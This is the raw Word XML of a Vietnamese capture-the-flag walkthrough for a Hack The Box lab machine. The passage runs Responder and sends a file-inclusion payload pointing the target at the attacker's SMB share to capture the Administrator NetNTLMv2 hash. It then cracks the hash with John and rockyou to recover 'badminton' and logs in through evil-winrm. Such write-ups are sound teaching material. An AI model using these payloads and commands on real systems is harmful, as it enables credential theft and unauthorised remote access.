    <w:p w14:paraId="5161152C" w14:textId="6C702F3F" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nếu công cụ Responder chưa cài trên máy, chúng ta sẽ clone kho chứa Responder đến máy cục bộ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D16406" w14:textId="49F6EF74" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214D149A" w14:textId="771194E3" w:rsidR="00F36138" w:rsidRPr="003B1F60" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B1F60">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git clone https://github.com/lgandx/Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889C43E" w14:textId="583A816C" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E391EE5" w14:textId="1C17146A" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiểm tra Responder.conf có lắng nghe yêu cầu SMB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4BB759" w14:textId="3C76DFFA" w:rsidR="00463B08" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45DB3D80" wp14:editId="76790739">
            <wp:extent cx="5286210" cy="291532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7419" cy="2927019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B5FE0" w14:textId="1319D6FD" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61596DBE" w14:textId="4A08ED23" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bắt đầu Responder với python3, truyền vào giao diện mạng bạn muốn nghe bằng flag -I:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E23C4" w14:textId="03C7DF8A" w:rsidR="00F36138" w:rsidRPr="003B1F60" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B1F60">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo python3 Responder.py -I tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D76EF3" w14:textId="54C8347F" w:rsidR="00F36138" w:rsidRPr="003B1F60" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F92CC46" w14:textId="5B8DFE9E" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong Kali Linux, Responder được cài sẵn nên nó có thể chạy bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716DE86F" w14:textId="207ADFE4" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EBE128" w14:textId="3EFE2B26" w:rsidR="00F36138" w:rsidRPr="003B1F60" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B1F60">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo responder -I {network_interface}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA1E82" w14:textId="60012290" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2697D724" w14:textId="0973C2C2" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong trường hợp của chúng ta, lỗi sinh ra do không thể bắt đầu máy chủ TCP ở cổng 80 vì cổng 80 đang được sử dụng bởi 1 một dịch vụ khác trên máy chủ. Lỗi này có thể được khắc phục bằng cách thay đổi tập tin Responder.conf để tắt </w:t>
      </w:r>
      <w:r w:rsidR="003B1F60">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mục HTTP được liệt kê bên dưới “Servers to start”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39033922" w14:textId="4BB3B115" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECD3E78"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Location of Responder.conf file -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2463B"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-&gt; for default system install : /usr/share/responder/Responder.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479D4367" w14:textId="42093AF8"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-&gt; for github installation : /installation_directory/Responder.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77281362" w14:textId="577C87E4" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="003B1F60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F76283E" w14:textId="4305E5B4" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="003B1F60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đặt HTTP là Off dưới mục “Servers to start” trong tập tin Responder.conf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5449FE02" w14:textId="35A287D7" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="003B1F60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7465568E"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 Servers to start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB6875C"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SQL = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73C556"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SMB = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53666A41"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RDP = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B071CC0"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Kerberos = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE6C31E"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FTP = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D86025"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POP = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED23DC"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SMTP = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885A682"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IMAP = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A51B62C" w14:textId="77777777"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HTTP = On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37421946" w14:textId="3C295C15" w:rsidR="003B1F60" w:rsidRPr="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="003B1F60">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B1F60">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[** SNIP **]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E8EC0" w14:textId="77777777" w:rsidR="00463B08" w:rsidRPr="004569DA" w:rsidRDefault="00463B08" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57190577" w14:textId="63314042" w:rsidR="001272F7" w:rsidRDefault="003B1F60" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28FCEB2D" wp14:editId="076906A9">
            <wp:extent cx="5415581"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7477" cy="4582043"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="737B0D06" w14:textId="52AF9258" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348E1ADA" w14:textId="56972851" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder được cài đặt xong, chúng ta sẽ yêu cầu máy chủ include một tài nguyên từ máy chủ SMB giả bằng cách đặt tham số page như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF288C8" w14:textId="16766D4D" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584BD433" w14:textId="7547E60C" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://unika.htb/?page=//10.10.14.25/somefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625149ED" w14:textId="638DF4C5" w:rsidR="003B1F60" w:rsidRDefault="003B1F60" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA0841A" w14:textId="2F81BFBE" w:rsidR="004B296A" w:rsidRDefault="003B1F60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chúng ta chỉ định địa chỉ của SMB share là địa chỉ IP </w:t>
      </w:r>
      <w:r w:rsidR="00406C60">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của máy tấn công. Bây giờ máy chủ cố gắng tải tài nguyên từ máy chủ SMB giả và Responder sẽ lấy được NetNTLMv2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA5B02C" w14:textId="32643AC9" w:rsidR="00406C60" w:rsidRDefault="00406C60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C6425C" w14:textId="48ADB2D8" w:rsidR="00406C60" w:rsidRDefault="00406C60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau khi gửi payload của chúng ta qua trình duyệt web chúng ta nhận được thông báo lỗi không tải được tập tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739F646F" w14:textId="4AB2D74B" w:rsidR="00406C60" w:rsidRDefault="00406C60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A6FCE67" wp14:editId="5AECC77B">
            <wp:extent cx="5943600" cy="1011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49FA3562" w14:textId="0799A734" w:rsidR="00406C60" w:rsidRDefault="00406C60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nhưng kiểm tra máy chủ Responder đang lắng nghe chúng ta có NetNTLMv2 của Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB02B9E" w14:textId="28E2EB98" w:rsidR="00406C60" w:rsidRDefault="00406C60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A18F0C" wp14:editId="10EB2B25">
            <wp:extent cx="5943600" cy="3361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2474EA71" w14:textId="6FFCADF3" w:rsidR="00406C60" w:rsidRDefault="00406C60">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAA3073" w14:textId="04A49E9E" w:rsidR="00406C60" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NetNTLMv2 bao gồm challenge và phản hồi được mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A65D26A" w14:textId="6F45FD21" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0CC5E9" w14:textId="05D1416F" w:rsidR="00270C12" w:rsidRPr="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00270C12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hash Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C7F1FA" w14:textId="5C9AD591" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFFFC09" w14:textId="5B632129" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta có thểm đẩy hash vào trong 1 tập tin và bẻ khóa nó với John.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FBF751" w14:textId="514B9499" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9097EF" w14:textId="5DEED520" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1638886C" wp14:editId="0D5DAE27">
            <wp:extent cx="5943600" cy="1877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877695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBBF5A9" w14:textId="6A1F155E" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45839A34" w14:textId="52F1254B" w:rsidR="00270C12" w:rsidRPr="000E26A3" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E26A3">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>john -w=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08309D12" w14:textId="4C066174" w:rsidR="00270C12" w:rsidRDefault="00270C12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD57589" w14:textId="6FF427EE" w:rsidR="00270C12" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35B9B15E" wp14:editId="3D513893">
            <wp:extent cx="5943600" cy="199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995805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ACCF13" w14:textId="7490B7E2" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EEB4AD7" w14:textId="0091E876" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password: badminton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788FA984" w14:textId="3A672511" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2205C2C9" w14:textId="51905182" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E26A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893C8D0" w14:textId="488B8C35" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8EB362" w14:textId="1501FFED" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta sẽ kết nối đến dịch vụ WinRM trên máy chủ. Vì Powershell không được cài đặt sẵn trên Linux, chúng ta sẽ dùng công cụ Evil-WinRM để kết nối:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690E81ED" w14:textId="6C9B4F17" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43BAB27B" w14:textId="74B0DC42" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E26A3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>evil-winrm -i 10.129.136.91 -u administrator -p badminton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611FD167" w14:textId="1CB148EB" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58471372" w14:textId="3FFEC7A3" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED59E52" wp14:editId="5527D8B1">
            <wp:extent cx="5943600" cy="2122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2C3D9534" w14:textId="15E69284" w:rsidR="000E26A3" w:rsidRDefault="000E26A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
